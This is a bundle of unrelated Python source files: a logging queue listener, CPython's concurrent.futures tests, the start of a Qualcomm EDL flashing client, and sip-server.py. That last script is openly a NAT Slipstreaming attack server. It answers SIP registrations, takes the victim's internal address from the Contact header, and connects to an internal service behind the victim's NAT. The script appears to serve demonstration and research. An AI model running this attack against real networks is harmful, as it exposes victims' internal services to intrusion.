self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
:param queue: The queue to listen to.
:param handlers: The handlers to invoke on everything received from
the queue.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses :meth:`~queue.Queue.get`. You may want to
override this method if you want to use timeouts or work with custom
queue implementations.
:param block: Whether to block if the queue is empty. If `False` and
the queue is empty, an :class:`~queue.Empty` exception
will be thrown.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
:param record: The record to prepare.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
:param record: The record to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
Writes a sentinel to the queue to tell the listener to quit. This
implementation uses ``put_nowait()``. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
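# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module): wires a QueueHandler
# to a logger and drains the queue on a QueueListener thread, as described in
# the module docstring. The handler choice (StreamHandler) and the logger name
# ('queue_demo') are illustrative assumptions only.
if __name__ == '__main__':
    import sys
    log_queue = queue.Queue(-1)  # unbounded in-process queue
    listener = QueueListener(log_queue, logging.StreamHandler(sys.stderr))
    listener.start()  # background thread begins pulling records off the queue
    logger = logging.getLogger('queue_demo')
    logger.setLevel(logging.INFO)
    logger.addHandler(QueueHandler(log_queue))
    logger.info('hello from the logging queue')  # handled on the listener thread
    listener.stop()  # enqueue the sentinel, join the thread, flush remaining records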
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.support.script_helper import assert_python_ok
import itertools
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
def setUp(self):
super().setUp()
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
super().tearDown()
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
del executor
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.close()
call_queue.join_thread()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, BaseTestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, BaseTestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, BaseTestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, BaseTestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
sip-server.py
|
#!/usr/bin/python3
### Simple SIP Server - natty slipstream
### Just handles SIP part (no HTTP magic)
### Inspired by NAT Slipstream code (https://samy.pl/slipstream)
from socket import socket, SOL_SOCKET, SOCK_STREAM, SO_REUSEADDR, AF_INET
from re import search
from http.server import HTTPServer
from handler import Handler
from argparse import ArgumentParser, ArgumentTypeError
from threading import Thread
# serve pwn_port on http server
def run(listen_port, pwn_port):
print('HTTP serving port {} from port {}'.format(pwn_port, listen_port))
Handler.port_num = pwn_port
httpd = HTTPServer(('', listen_port), Handler)
httpd.serve_forever()
# Type to ensure port range. Could use argparse's "choices" option, but it looks terrible in the help output
def port(num):
    if isinstance(num, str):
        try:
            ret_num = int(num)
            if 1 <= ret_num <= 65535:
                return ret_num
        except ValueError:
            pass
    raise ArgumentTypeError('Value {} is not a valid port. Must be an integer within [1, 65535]'.format(num))
# CLI argument parsing
def get_args():
parser = ArgumentParser(description='NAT Slipstreaming via Python')
parser.add_argument('pwn_port', help='Port on the victim to connect to', type=port, default=3306)
parser.add_argument('-l', '--listen-port', help='Port for the HTTP server to listen on.', default=8080, type=port)
return parser.parse_args()
def main(args):
# Regex that pulls the victim's "IPv4:port" out of the SIP Contact header (the ';' lookahead keeps the port but not the semicolon)
contact_pattern = r'(25[0-5]|2[0-4]\d|[01]?\d\d?)\.(25[0-5]|2[0-4]\d|[01]?\d\d?)\.(25[0-5]|2[0-4]\d|[01]?\d\d?)\.(25[0-5]|2[0-4]\d|[01]?\d\d?):\d+(?=;)'
http_thread = Thread(target=run, args=(args.listen_port, args.pwn_port))
http_thread.start()
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind(("", 5060))
s.listen()
i = 1
print('Begin connection acceptance loop')
while True:
con, client = s.accept()
print("Connection from", client)
done = 0
incoming_message = ""
while done < 4:  # end of message: four consecutive CR/LF bytes, i.e. the "\r\n\r\n" that terminates the SIP headers
dataFromClient = con.recv(1)
d = dataFromClient.decode()
incoming_message += d
print(d, end="")
done = done + 1 if d in "\r\n" else 0
contact = ""
via = ""
header = '-' * 5 + ' RECEIVED ' + '-' * 5
print('-' * 5, 'RECEIVED', '-' * 5)
print(incoming_message)
print('-' * len(header))
for line in incoming_message.splitlines():
if line.startswith("Contact:"):
contact = line
print('Contact: \"{}\"'.format(contact))
if line.startswith("Via:"):
via = line
print('Via: \"{}\"'.format(via))
print("Sending response #{}".format(i))
i += 1
BODY = "SIP/2.0 200 OK\r\n" + \
via + ";received=0.0.0.0\r\n" + \
"From: <sip:wuzzi@example.org;transport=TCP>;tag=U7c3d519\r\n" + \
"To: <sip:wuzzi@example.org;transport=TCP>;tag=37GkEhwl6\r\n" + \
"Call-ID: aaaaaaaaaaaaaaaaa0404aaaaaaaaaaaabbbbbbZjQ4M2M.\r\n" + \
"CSeq: 1 REGISTER\r\n" + \
contact + ";expires=3600\r\n" + \
"Content-Length: 0\r\n\r\n"
print(BODY)
print('-' * len(header))
con.send(BODY.encode("ascii"))
# Connect to pwnd service
con_ip, con_port = search(contact_pattern, contact).group().split(':')
s2 = socket(AF_INET, SOCK_STREAM)
s2.connect((con_ip, int(con_port)))
s2.send(b'pwned\n')
s2.close()
con.close()
print("Response sent.")
if __name__ == '__main__':
main(get_args())
|
firehose.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# (c) B.Kerler 2018-2019
import binascii
import io
import platform
import time
import json
from struct import unpack
from binascii import hexlify
from queue import Queue
from threading import Thread
from edlclient.Library.utils import *
from edlclient.Library.gpt import gpt
from edlclient.Library.sparse import QCSparse
from edlclient.Library.utils import progress
try:
from edlclient.Library.Modules.init import modules
except ImportError as e:
pass
class nand_partition:
partentries = {}
def __init__(self, parent, printer=None):
if printer is None:
self.printer = print
else:
self.printer = printer
self.partentries = {}
self.partitiontblsector = None
self.parent = parent
self.storage_info = {}
def parse(self, partdata):
self.partentries = {}
class partf:
sector = 0
sectors = 0
name = ""
attr1 = 0
attr2 = 0
attr3 = 0
which_flash = 0
magic1, magic2, version, numparts = unpack("<IIII", partdata[0:0x10])
if magic1 == 0x55EE73AA or magic2 == 0xE35EBDDB:
data = partdata[0x10:]
for i in range(0, len(data) // 0x1C):
name, offset, length, attr1, attr2, attr3, which_flash = unpack("16sIIBBBB",
data[i * 0x1C:(i * 0x1C) + 0x1C])
if name[1] != 0x3A:
break
np = partf()
np.name = name[2:].rstrip(b"\x00").decode('utf-8').lower()
np.sector = offset * self.parent.cfg.block_size // self.parent.cfg.SECTOR_SIZE_IN_BYTES
np.sectors = (length & 0xFFFF) * self.parent.cfg.block_size // self.parent.cfg.SECTOR_SIZE_IN_BYTES
np.attr1 = attr1
np.attr2 = attr2
np.attr3 = attr3
np.which_flash = which_flash
self.partentries[np.name] = np
return True
return False
def print(self):
self.printer("Name Offset\t\tLength\t\tAttr\t\t\tFlash")
self.printer("-------------------------------------------------------------")
for selpart in self.partentries:
partition = self.partentries[selpart]
name = partition.name
for i in range(0x10 - len(partition.name)):
name += " "
offset = partition.sector * self.parent.cfg.SECTOR_SIZE_IN_BYTES
length = partition.sectors * self.parent.cfg.SECTOR_SIZE_IN_BYTES
attr1 = partition.attr1
attr2 = partition.attr2
attr3 = partition.attr3
which_flash = partition.which_flash
self.printer(
f"{name}\t%08X\t%08X\t{hex(attr1)}/{hex(attr2)}/{hex(attr3)}\t{which_flash}" % (offset, length))
def writefile(wf, q, stop):
while True:
data = q.get()
if len(data) > 0:
wf.write(data)
q.task_done()
if stop() and q.empty():
break
class asyncwriter():
def __init__(self, wf):
self.writequeue = Queue()
self.worker = Thread(target=writefile, args=(wf, self.writequeue, lambda: self.stopthreads,))
self.worker.daemon = True
self.stopthreads = False
self.worker.start()
